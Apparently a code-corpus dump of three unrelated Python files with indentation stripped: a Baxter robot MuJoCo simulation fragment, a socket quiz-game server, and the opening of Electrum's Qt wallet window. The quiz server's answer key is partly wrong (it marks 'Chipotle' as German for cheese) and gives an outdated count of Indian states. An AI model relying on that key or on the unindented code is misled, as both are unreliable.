self._ind_cache[param.name] = -1
if param_ind == -1: continue
pos = param.pose[:, t]
xpos[param_ind] = pos + np.array([MUJOCO_MODEL_X_OFFSET, 0, MUJOCO_MODEL_Z_OFFSET])
if hasattr(param, 'rotation'):
rot = param.rotation[:, t]
mat = OpenRAVEBody.transform_from_obj_pose([0,0,0], rot)[:3,:3]
xquat[param_ind] = openravepy.quatFromRotationMatrix(mat)
self.physics.data.xpos[:] = xpos[:]
self.physics.data.xquat[:] = xquat[:]
model.body_pos[:] = xpos[:]
model.body_quat[:] = xquat[:]
baxter = plan.params['baxter']
self.physics.data.qpos[1:8] = baxter.rArmPose[:, t]
self.physics.data.qpos[8] = baxter.rGripper[:, t]
self.physics.data.qpos[9] = -baxter.rGripper[:, t]
self.physics.data.qpos[10:17] = baxter.lArmPose[:, t]
self.physics.data.qpos[17] = baxter.lGripper[:, t]
self.physics.data.qpos[18] = -baxter.lGripper[:, t]
self.physics.forward()
def mp_state_from_sim(self, plan):
X = np.zeros(plan.symbolic_bound)
for param_name, attr_name in plan.state_inds:
inds = plan.state_inds[param_name, attr_name]
if param_name in plan.params:
param = plan.params[param_name]
if param_name == 'baxter':
pass
elif not param.is_symbol():
if attr_name == 'pose':
X[inds] = self.get_item_pos(param_name)
elif attr_name == 'rotation':
X[inds] = self.get_item_rot(param_name, convert_to_euler=True)
def jnt_ctrl_from_plan(self, plan, t):
baxter = plan.params['baxter']
lArmPose = baxter.lArmPose[:, t]
lGripper = baxter.lGripper[:, t]
rArmPose = baxter.rArmPose[:, t]
rGripper = baxter.rGripper[:, t]
ctrl = np.r_[rArmPose, rGripper, -rGripper, lArmPose, lGripper, -lGripper]
return self.step(joint_angles=ctrl)
def run_plan(self, plan):
self.reset()
obs = []
for t in range(plan.horizon):
obs.append(self.jnt_ctrl_from_plan(plan, t))
return obs
def _move_to(self, pos, gripper1, gripper2, left=True, view=False):
observations = [self.get_obs(view=False)]
if not self._check_ik(pos, quat=DOWN_QUAT, use_right=not left):
return observations
limit1 = np.array([0.01, 0.01, 0.035])
limit2 = np.array([0.005, 0.005, 0.01])
ee_above = pos + np.array([0.0, 0, 0.2])
ee_above[2] = np.minimum(ee_above[2], 0.6)
inds = ([[4,5,6]], 7) if left else ([[0,1,2]], 3)
aux_inds = ([[0,1,2]], 3) if left else ([[4,5,6]], 7)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
aux_ee_pos = [0.6, -0.5, 0.2] if left else [0.6, 0.5, 0.2]
end_ee_pos = [0.6, 0.5, 0.2] if left else [0.6, -0.5, 0.2]
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
max_iter = 20
cur_iter = 0
while np.any(np.abs(ee_pos - ee_above) > limit1) or np.abs(gripper_angle < gripper1*0.015):
next_ee_cmd = np.minimum(np.maximum(ee_above - ee_pos, -0.2*np.ones((3,))), 0.2*np.ones((3,)))
# next_ee_cmd = ee_above - ee_pos
# next_ee_cmd[2] += 0.03
next_ee_cmd[0] = next_ee_cmd[0] if ee_above[0] > 0.5 else next_ee_cmd[0]
next_cmd = np.zeros((8,))
next_cmd[inds[0]] = next_ee_cmd
next_cmd[inds[1]] = gripper1
cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
cur_iter += 1
if cur_iter > max_iter and np.all(np.abs(ee_pos - ee_above)[:2] < 0.05): break
if cur_iter > 2*max_iter: break
next_cmd = np.zeros((8,))
next_cmd[inds[1]] = gripper1
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
max_iter = 15
cur_iter = 0
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
while np.any(np.abs(ee_pos - pos) > limit2):
next_ee_cmd = np.minimum(np.maximum(pos - ee_pos, -0.05*np.ones((3,))), 0.05*np.ones((3,)))
# next_ee_cmd = pos - ee_pos
next_ee_cmd[2] += 0.01
next_ee_cmd[0] = next_ee_cmd[0] - 0.01 if pos[0] > 0.5 else next_ee_cmd[0] - 0.01
next_cmd = np.zeros((8,))
next_cmd[inds[0]] = next_ee_cmd
next_cmd[inds[1]] = gripper1
cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
cur_iter += 1
if cur_iter > max_iter: break
next_cmd = np.zeros((8,))
next_cmd[inds[1]] = gripper2
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
cur_iter = 0
max_iter = 5
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
while np.any(np.abs(ee_pos - ee_above) > limit1):
next_ee_cmd = np.minimum(np.maximum(ee_above - ee_pos, -0.1*np.ones((3,))), 0.1*np.ones((3,)))
# next_ee_cmd = ee_above - ee_pos
next_cmd = np.zeros((8,))
next_cmd[inds[0]] = next_ee_cmd
next_cmd[inds[1]] = gripper2
cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# observations.append((next_cmd, obs))
observations.append(obs)
ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
cur_iter += 1
if cur_iter > max_iter: break
# cur_iter = 0
# max_iter = 10
# ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
# gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
# while np.any(np.abs(ee_pos - end_ee_pos) > limit1):
# next_ee_cmd = np.minimum(np.maximum(end_ee_pos - ee_pos, -0.1*np.ones((3,))), 0.1*np.ones((3,)))
# # next_ee_cmd = ee_above - ee_pos
# next_cmd = np.zeros((8,))
# next_cmd[inds[0]] = next_ee_cmd
# next_cmd[inds[1]] = gripper2
# cur_aux_ee_pos = self.get_right_ee_pos() if left else self.get_left_ee_pos()
# next_cmd[aux_inds[0]] = aux_ee_pos - cur_aux_ee_pos
# obs, _, _, _ = self.step(next_cmd, mode='end_effector_pos', view=view)
# # observations.append((next_cmd, obs))
# observations.append(obs)
# ee_pos = self.get_left_ee_pos() if left else self.get_right_ee_pos()
# gripper_angle = self.get_gripper_joint_angles()[1] if left else self.get_gripper_joint_angles()[0]
# cur_iter += 1
# if cur_iter > max_iter: break
return observations
# def move_left_to_grasp(self, item_name, view=False):
# item_pos = self.get_item_pos(item_name)
# return self._move_to(item_pos, 1, 0, True, view)
def move_left_to_grasp(self, pos, view=False):
return self._move_to(pos, 1, 0, True, view)
def move_left_to_place(self, target_pos, view=False):
return self._move_to(target_pos, 0, 1, True, view)
def move_left_to(self, pos1, pos2, reset_arm=True, view=True):
if pos1[1] < -0.2 or pos2[1] < -0.2 or pos1[1] > 0.8 or pos2[1] > 0.8:
return [self.get_obs(view=False)]
if not (self._check_ik(pos1, quat=DOWN_QUAT, use_right=False) and \
self._check_ik(pos2, quat=DOWN_QUAT, use_right=False)):
return [self.get_obs(view=False)]
self.physics.data.qpos[8] = 0.03
self.physics.data.qpos[9] = -0.03
self.physics.data.qpos[17] = 0.03
self.physics.data.qpos[18] = -0.03
self.physics.forward()
start_jnts = self.get_arm_joint_angles()
obs1 = self.move_left_to_grasp(pos1, view)
obs2 = self.move_left_to_place(pos2, view)
if reset_arm:
self.set_arm_joint_angles(start_jnts)
self.physics.forward()
return np.r_[obs1, obs2]
# def move_right_to_grasp(self, item_name, view=False):
# item_pos = self.get_item_pos(item_name)
# return self._move_to(item_pos, 1, 0, False, view)
def move_right_to_grasp(self, pos, view=False):
return self._move_to(pos, 1, 0, False, view)
def move_right_to_place(self, target_pos, view=False):
return self._move_to(target_pos, 0, 1, False, view)
def move_right_to(self, pos1, pos2, reset_arm=True, view=True):
if pos1[1] > 0.2 or pos2[1] > 0.2 or pos1[1] < -0.8 or pos2[1] < -0.8:
return [self.get_obs(view=False)]
if not (self._check_ik(pos1, quat=DOWN_QUAT, use_right=True) and \
self._check_ik(pos2, quat=DOWN_QUAT, use_right=True)):
return [self.get_obs(view=False)]
self.physics.data.qpos[8] = 0.03
self.physics.data.qpos[9] = -0.03
self.physics.data.qpos[17] = 0.03
self.physics.data.qpos[18] = -0.03
self.physics.forward()
start_jnts = self.get_arm_joint_angles()
obs1 = self.move_right_to_grasp(pos1, view)
obs2 = self.move_right_to_place(pos2, view)
if reset_arm:
self.set_arm_joint_angles(start_jnts)
self.physics.forward()
return np.r_[obs1, obs2]
# def close(self):
# self.active = False
# if self._viewer is not None and self.use_glew:
# self._viewer.close()
# self._viewer = None
# self.physics.free()
# def seed(self, seed=None):
# pass
# def list_joint_info(self):
# for i in range(self.physics.model.njnt):
# print('\n')
# print('Jnt ', i, ':', self.physics.model.id2name(i, 'joint'))
# print('Axis :', self.physics.model.jnt_axis[i])
# print('Dof adr :', self.physics.model.jnt_dofadr[i])
# body_id = self.physics.model.jnt_bodyid[i]
# print('Body :', self.physics.model.id2name(body_id, 'body'))
# print('Parent body :', self.physics.model.id2name(self.physics.model.body_parentid[body_id], 'body'))
|
Server.py
|
import socket
from threading import Thread
import random
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip_address = '127.0.0.1'
port = 5000
server.bind((ip_address, port))
server.listen()
clients = []
nicknames = []
questions = [
" What is the German word for Cheese? \n a.Mozarella\n b.Cheese\n c.Kase\n d.Chipotle",
" Water boils at 212 Units at which scale? \n a.Fahrenheit\n b.Celsius\n c.Rankine\n d.Kelvin",
" Which sea creature has three hearts? \n a.Dolphin\n b.Octopus\n c.Walrus\n d.Seal",
" Who was the character famous in our childhood rhymes associated with a lamb? \n a.Mary\n b.Jack\n c.Johnny\n d.Mukesh",
" How many bones does an adult human have? \n a.206\n b.208\n c.201\n d.196",
" How many wonders are there in the world? \n a.7\n b.8\n c.10\n d.4",
" What element does not exist? \n a.Xf\n b.Re\n c.Si\n d.Pa",
" How many states are there in India? \n a.24\n b.29\n c.30\n d.31",
" Who invented the telephone? \n a.A.G Bell\n b.John Wick\n c.Thomas Edison\n d.G Marconi",
" Who is Loki? \n a.God of Thunder\n b.God of Dwarves\n c.God of Mischief\n d.God of Gods",
" Who was the first Indian female astronaut ? \n a.Sunita Williams\n b.Kalpana Chawla\n c.None of them\n d.Both of them ",
" What is the smallest continent? \n a.Asia\n b.Antarctic\n c.Africa\n d.Australia",
" The beaver is the national embelem of which country? \n a.Zimbabwe\n b.Iceland\n c.Argentina\n d.Canada",
" How many players are on the field in baseball? \n a.6\n b.7\n c.9\n d.8",
" Hg stands for? \n a.Mercury\n b.Hulgerium\n c.Argenine\n d.Halfnium",
" Who gifted the Statue of Libery to the US? \n a.Brazil\n b.France\n c.Wales\n d.Germany",
" Which planet is closest to the sun? \n a.Mercury\n b.Pluto\n c.Earth\n d.Venus"
]
answers = ['d', 'a', 'b', 'a', 'a', 'a', 'a', 'b', 'a', 'c', 'b', 'd', 'd', 'c', 'a', 'b', 'a']
print("Server has started successfully!")
def clientthread(conn , nickname):
score = 0
conn.send("Welcome to this Quiz Game!".encode('utf-8'))
conn.send("You will receive a question. The answer to that question should be one of a, b, c or d\n".encode('utf-8'))
conn.send("Good Luck!\n\n".encode('utf-8'))
index, question, answer = get_random_question_answer(conn)
print(answer)
while True:
try:
message = conn.recv(2048).decode('utf-8')
if message:
if message.lower() == answer:
score += 1
conn.send(f"Nice! Your score is {score}\n\n".encode('utf-8'))
else:
conn.send("Incorrect answer! Better luck next time!\n\n".encode('utf-8'))
remove_question(index)
index, question, answer = get_random_question_answer(conn)
print(answer)
else:
remove(conn)
remove_nickname(nickname)
except Exception as e:
print(str(e))
continue
def get_random_question_answer(conn):
random_index = random.randint(0, len(questions) - 1)
random_question = questions[random_index]
random_answer = answers[random_index]
conn.send(random_question.encode('utf-8'))
return random_index, random_question, random_answer
def remove_question(index):
questions.pop(index)
answers.pop(index)
def remove(connection):
if connection in clients:
clients.remove(connection)
def remove_nickname(nickname):
if nickname in nicknames:
nicknames.remove(nickname)
while True:
conn, addr = server.accept()
conn.send('NICKNAME'.encode('utf-8'))
nickname = conn.recv(2048).decode('utf-8')
clients.append(conn)
nicknames.append(nickname)
print (nickname + " connected")
new_thread = Thread(target= clientthread,args=(conn , nickname))
new_thread.start()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum import keystore, simple_config
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet, AddTransactionException
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if NetworkConstants.TESTNET else "Electrum"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
